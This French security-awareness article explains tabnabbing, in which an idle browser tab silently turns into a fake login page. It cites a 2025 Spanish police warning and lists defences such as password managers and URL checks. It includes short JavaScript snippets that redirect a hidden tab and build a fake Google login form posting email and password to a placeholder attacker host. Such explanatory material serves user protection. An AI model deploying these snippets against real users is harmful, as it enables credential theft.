Nox 
Parmi les nombreuses techniques de phishing, certaines passent inaperçues car elles n’impliquent ni pièces jointes piégées ni mails suspects. Le Tabnabbing fait partie de ces méthodes silencieuses qui s’appuient davantage sur notre comportement d’utilisateur que sur une faille logicielle.
C’est une attaque d’ingénierie sociale. Elle tire parti d’une habitude universelle : garder plusieurs onglets ouverts pendant une session de navigation. On ouvre un article, on passe à ses mails, puis à un réseau social… et on oublie. Ce que peu de gens savent, c’est qu’un onglet inactif peut très bien changer de contenu sans aucune action de votre part.
Le Tabnabbing mise sur cette inattention. L’idée est simple : une page laissée ouverte modifie son contenu pour ressembler à une page de connexion connue. Et lorsqu’on y revient, on croit légitimement devoir se reconnecter. C’est précisément là que l’attaque se déclenche.
Peu visible, peu bruyante, et pourtant diablement efficace, cette technique mérite qu’on s’y attarde — car elle ne nécessite aucun téléchargement, aucun clic… juste un peu de patience.
Fonctionnement — Comment le Tabnabbing piège les internautes
Le Tabnabbing repose sur une idée simple mais redoutablement efficace : exploiter l’inactivité d’un onglet pour en modifier subrepticement le contenu, sans que l’utilisateur ne s’en rende compte. C’est une forme avancée de phishing passif, déclenchée uniquement lorsque l’utilisateur revient sur un onglet qu’il pense reconnaître.
Étapes techniques de l’attaque
Chargement initial d’un site légitime ou anodin
L’utilisateur ouvre une page web contenant du contenu banal — article, forum, ou page d’accueil quelconque. Rien d’alarmant au premier abord.
Détection de l’inactivité de l’onglet
Le site surveille si l’onglet est toujours actif ou non. Pour cela, il utilise des API comme document.hidden (de l’API Page Visibility) ou les événements blur et focus. Lorsqu’un onglet devient inactif ou reste en arrière-plan pendant un certain temps, l’attaque peut s’amorcer.
Changement dynamique du contenu de l’onglet
Au bout de quelques minutes, la page modifie son contenu HTML et son titre (document.title) pour ressembler à une page de connexion familière — par exemple, celle de Gmail ou Outlook :
javascriptCopierModifierif (document.hidden) { setTimeout(() => { document.location.href = "https://login_Hack.example.com"; }, 60000); // Attendre 1 minute } Ou, plus subtilement :
javascriptCopierModifierdocument.title = "Connexion - Google"; document.body.innerHTML = ` <form action="https://login_Hack.example.com/form" method="POST"> <input type="text" name="email" placeholder="Adresse e-mail" /> <input type="password" name="password" placeholder="Mot de passe" /> <button type="submit">Se connecter</button> </form> `;Retour de l’utilisateur sur l’onglet
L’utilisateur, croyant être déconnecté de sa session habituelle, saisit à nouveau ses identifiants… qui sont alors envoyés directement à l’attaquant.
Ce qui rend cette attaque efficace
- Aucune alerte du navigateur : contrairement à une redirection ou une requête vers un domaine douteux, l’utilisateur reste sur le même onglet.
- Comportement humain exploité : on ne lit pas toujours l’URL dans la barre d’adresse quand on pense « reconnaître » une page.
- Pas besoin de code malveillant complexe : un simple script JavaScript suffit.
- Difficile à détecter : surtout si l’utilisateur a l’habitude d’ouvrir beaucoup d’onglets.
Comment est-ce possible de subir ce genre d’attaque ?
Le Tabnabbing ne repose pas sur une faille de sécurité dans le navigateur à proprement parler. Il s’appuie sur le comportement parfaitement autorisé et normal d’une page web : pouvoir se modifier dynamiquement via JavaScript, y compris lorsqu’elle est en arrière-plan. Voici les éléments techniques qui rendent ce type d’attaque possible :
🧱 1. Les pages web peuvent se réécrire elles-mêmes
Une page web peut modifier son propre contenu à tout moment en utilisant JavaScript. Cela fait partie intégrante du fonctionnement du Web moderne. C’est ce qui permet l’expérience interactive d’un site (changement de contenu sans rechargement, animation, mise à jour automatique…).
Exemple :
javascriptCopierModifierdocument.body.innerHTML = "<h1>Nouvelle page affichée</h1>";
Ce comportement n’est pas malveillant en soi — il devient dangereux lorsqu’il est détourné à des fins de phishing.
🕶 2. L’onglet inactif n’est pas surveillé par l’utilisateur
Quand un onglet passe à l’arrière-plan, il reste actif en mémoire. Il peut continuer à exécuter du code JavaScript, même si son exécution est parfois ralentie pour économiser des ressources.
Les API modernes comme document.hidden permettent à une page de savoir qu’elle n’est plus visible. Cela donne à l’attaquant un signal clair : l’utilisateur est parti, il est temps de préparer le piège.
🧠 3. Le cerveau humain est prévisible
L’un des points clés du Tabnabbing, c’est qu’il s’appuie sur notre mémoire visuelle et nos automatismes. Un titre d’onglet du type « Connexion – Google », accompagné d’un formulaire connu, suffit souvent à tromper l’utilisateur.
Et surtout : on ne pense pas qu’un onglet déjà ouvert puisse changer de contenu à notre insu. Cette illusion de continuité est l’arme principale de l’attaque.
🚫 4. Les navigateurs ne bloquent pas ce comportement
Pour l’instant, aucun navigateur web ne bloque ou n’alerte lorsqu’une page modifie son contenu après un certain temps d’inactivité. Cela fait partie des capacités normales d’un site. Il ne s’agit donc pas d’un « exploit » ou d’une vulnérabilité technique, mais d’un abus d’un comportement autorisé.
Cas réel – Alerte de la Police nationale espagnole (avril 2025)
Au printemps 2025, la Police nationale d’Espagne a émis une mise en garde officielle face à une recrudescence d’attaques par tabnabbing
🧩 Le scénario :
- Les victimes laissent plusieurs onglets ouverts (e‑mail, réseaux sociaux, shopping…).
- Un site inactif — volontairement choisi ou piraté — modifie son contenu en une page de connexion falsifiée (Gmail, Outlook, banque…).
- De retour, l’utilisateur croît que sa session a expiré et saisit ses identifiants.
- Ces derniers sont alors capturés par l’attaquant, sans aucun signe invisible ou téléchargement.
La Police a souligné que :
- L’attaque ne requiert aucun clic suspect ou pièce jointe malveillante.
- Elle repose essentiellement sur la confiance visuelle et la perception d’immuabilité des onglets
- Les conséquences peuvent être graves — de la compromission de comptes mails jusqu’à l’accès aux fonds bancaires, si celle-ci était demandée.
💡 Pourquoi ce cas a fait du bruit
- Autorité officielle : la mise en garde émanait directement de la Police, ce qui augmente la portée et la crédibilité de l’alerte
- Retour d’expérience : les conséquences étaient concrètes — vol de données sensibles sans trace.
- Rappel d’un ancien ennemi remis au goût du jour : bien que connu depuis 2010 (découvert par Aza Raskin), le tabnabbing renaît dans un contexte où le multitâche est roi, avec le télétravail et une attention fragmentée
📚 Rapide historique technique
Le tabnabbing a été documenté dès 2010 par le créatif de Mozilla Aza Raskin, qui a démontré comment un onglet inactif peut être transformé en page de fausse connexion, y compris titre et favicon
Depuis, des variantes ont vu le jour (comme le reverse tabnabbing via window.opener) et des cas sur des cibles comme Coinbase (cryptomonnaies) ou même des attaques visant Emmanuel Macron en 2017
Cette alerte récente en Espagne montre encore une fois que, même simple, le tabnabbing reste une menace réelle en 2025 — combinant ingénierie sociale moderne et pratiques automatisées de web malveillant.
Se prémunir du Tabnabbing — Pratiques et outils pour ne pas se faire piéger
Le Tabnabbing est redoutable parce qu’il n’exploite aucune faille de sécurité logicielle. Il détourne des mécanismes standards du web et cible avant tout l’utilisateur, ses habitudes et son attention. Heureusement, il existe plusieurs moyens concrets pour s’en protéger efficacement.
✅ 1. Utiliser un gestionnaire de mots de passe
Les gestionnaires modernes (comme Bitwarden, 1Password, KeePassXC, etc.) ne remplissent pas automatiquement les champs de connexion si le domaine ne correspond pas exactement à celui du site enregistré.
Ainsi, si une fausse page imite Gmail mais que l’URL est frauduleuse (login-google.support, par exemple), aucun identifiant ne sera pré-rempli. Cela constitue un excellent indicateur de fraude.
Bon réflexe : si votre gestionnaire ne réagit pas, vérifiez immédiatement l’URL du site.
✅ 2. Vérifier systématiquement l’URL avant de saisir ses identifiants
Même si l’interface semble familière, l’adresse du site est la seule source fiable. Une URL suspecte (nom de domaine mal orthographié, domaine secondaire étrange, absence de HTTPS…) est souvent le seul signe visible d’un piège.
Astuce : utilisez des marque-pages (favoris) pour accéder à vos services sensibles, plutôt que de taper l’URL ou cliquer sur des liens.
✅ 3. Fermer les onglets inactifs et inutilisés
Moins vous avez d’onglets ouverts, moins vous êtes exposé à ce type d’attaque. Les onglets laissés ouverts pendant des heures sont des cibles parfaites pour le tabnabbing.
Astuce : installez une extension qui ferme automatiquement les onglets inactifs au bout d’un certain temps (ex. : The Great Discarder, Tab Wrangler).
✅ 4. Désactiver JavaScript sur les sites peu fiables (avancé)
Des extensions comme NoScript (Firefox) ou uMatrix (anciennement sur Chrome) permettent de bloquer l’exécution de JavaScript sur des sites que vous ne connaissez pas ou que vous n’avez pas explicitement autorisés.
⚠️ Attention : cela peut casser l’affichage ou le fonctionnement de nombreux sites légitimes — à utiliser par des utilisateurs avancés uniquement.
✅ 5. Utiliser une extension anti-phishing
Certaines extensions comme HTTPS Everywhere, DuckDuckGo Privacy Essentials ou Privacy Badger ne bloquent pas directement le tabnabbing, mais réduisent l’exposition à des contenus tiers non sécurisés ou malveillants.
✅ 6. Éduquer, sensibiliser, rester critique
Le facteur humain est toujours la cible principale. Se former, partager l’information autour de soi et adopter une posture de vigilance numérique sont les meilleurs remparts à long terme.
Conclusion — La menace invisible dans vos habitudes
Le Tabnabbing est une attaque qui rappelle une chose essentielle : en cybersécurité, la menace ne vient pas toujours d’une faille technique. Parfois, c’est notre propre routine numérique qui devient le vecteur du danger.
Aucune alerte antivirus, aucun signal visible — juste un onglet inactif, laissé de côté, qui devient une porte d’entrée vers l’usurpation d’identité. Ce type d’attaque repose entièrement sur l’inattention, la confiance et l’habitude. Et c’est justement ce qui la rend efficace.
Heureusement, quelques bonnes pratiques suffisent à s’en prémunir : gestionnaires de mots de passe, attention portée aux URL, limitation des onglets inactifs, et surtout, un esprit critique aiguisé.
Dans un web toujours plus interactif, fluide et multitâche, savoir reconnaître les signes du phishing silencieux devient une compétence indispensable.
La prochaine fois que vous revenez sur un onglet oublié… demandez-vous : est-ce bien la même page que tout à l’heure ?
About the Author
